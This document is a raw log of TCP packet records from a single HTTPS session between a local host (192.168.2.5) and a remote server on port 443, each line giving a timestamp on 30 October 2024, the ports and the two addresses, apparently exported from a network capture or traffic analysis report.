                                                                                                                                                                              Oct 30, 2024 11:29:02.909713030 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:02.909764051 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:02.909779072 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:02.909804106 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:02.909822941 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:02.910864115 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:02.910883904 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:02.910973072 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:02.910985947 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:02.911031961 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:02.958084106 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:02.959026098 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:02.960205078 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:02.960206032 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:02.960284948 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:02.960336924 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:02.990886927 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:02.990911961 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:02.990993023 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:02.991040945 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:02.991101027 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:02.991333008 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:02.991348028 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:02.991403103 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:02.991415977 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:02.991466045 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:02.992738962 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:02.992753029 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:02.992835999 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:02.992847919 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:02.992897987 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.028796911 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.028821945 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.028894901 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.028978109 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.029020071 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.029020071 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.029571056 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.029592037 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.029652119 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.029675007 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.029720068 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.077153921 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.077178001 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.077234030 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.077291965 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.077328920 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.077328920 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.115267992 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.115293980 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.115437984 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.115524054 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.115581989 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.115591049 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.115602016 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.115644932 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.115662098 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.115679979 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.115719080 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.115719080 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.116493940 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.116507053 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.116559029 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.116573095 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.116599083 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.116619110 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.147382975 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.147407055 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.147483110 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.147505999 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.147545099 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.148128986 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.148153067 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.148189068 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.148195028 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.148225069 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.148246050 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.195815086 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.195836067 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.195970058 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.195990086 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.196033001 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.233982086 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.234008074 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.234117031 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.234139919 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.234181881 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.234580040 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.234596014 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.234648943 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.234656096 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.234692097 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.235341072 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.235358000 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.235410929 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.235416889 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.235441923 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.235460997 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.236093998 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.236107111 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.236156940 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.236161947 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.236202002 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.266463041 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.266480923 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.266587019 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.266598940 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.266637087 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.267103910 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.267117977 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.267163992 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.267169952 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.267195940 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.267219067 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.314814091 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.314832926 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.314949989 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.315012932 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.315076113 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.353331089 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.353353977 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.353467941 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.353487015 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.353539944 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.353646040 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.353662014 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.353722095 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.353734970 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.353785992 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.354407072 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.354422092 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.354479074 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.354491949 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.354538918 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.354948044 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.354963064 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.355012894 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.355026007 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.355086088 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.385795116 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.385812044 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.385965109 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.385987043 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.386044025 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.386365891 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.386380911 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.386436939 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.386451960 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.386488914 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.386511087 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.433521032 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.433537006 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.433619022 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.433635950 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.433690071 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.471761942 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.471776009 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.471853971 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.471869946 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.471920967 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.472619057 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.472632885 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.472696066 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.472727060 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.472770929 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.473361969 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.473376036 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.473437071 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.473448992 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.473499060 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.473865032 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.473880053 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.473948002 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.473959923 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.474013090 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.503930092 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.503947020 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.504009962 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.504024029 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.504076004 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.504411936 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.504425049 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.504612923 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.504625082 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.504678011 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.552165985 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.552185059 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.552293062 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.552308083 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.552364111 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.590454102 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.590471983 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.590542078 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.590553999 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.590604067 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.591006994 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.591021061 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.591080904 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.591093063 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.591145992 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.591514111 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.591528893 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.591589928 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.591600895 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.591650963 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.592096090 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.592108965 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.592168093 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.592180014 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.592256069 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.622162104 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.622176886 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.622261047 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.622273922 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.622320890 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.622781038 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.622796059 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.622868061 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.622879982 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.622934103 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.623565912 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.623581886 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.623646975 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.623665094 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.623692989 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.623713017 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.671170950 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.671188116 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.671250105 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.671262980 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.671325922 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.709419012 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.709439993 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.709538937 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.709557056 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.709625006 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.709907055 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.709922075 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.710092068 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.710104942 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.710156918 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.710498095 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.710511923 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.710572004 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.710585117 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.710629940 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.711167097 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.711180925 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.711251020 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.711263895 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.711308956 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.741692066 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.741707087 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.741791964 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.741806030 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.741883993 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.742053032 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.742065907 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.742135048 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.742146969 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.742218018 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.742419958 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.742434978 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.742495060 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.742506981 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.742547035 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.791943073 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.791959047 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.792260885 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.792275906 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.792340040 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.828495026 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.828511000 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.828623056 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.828635931 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.828691006 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.828953981 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.828968048 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.829025984 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.829036951 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.829085112 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.829576015 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.829588890 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.829654932 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.829667091 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.829736948 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.830097914 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.830111980 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.830171108 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.830183029 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.830229044 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:03.830971956 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.830986977 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:03.831053972 CET49705443192.168.2.5185.199.111.133
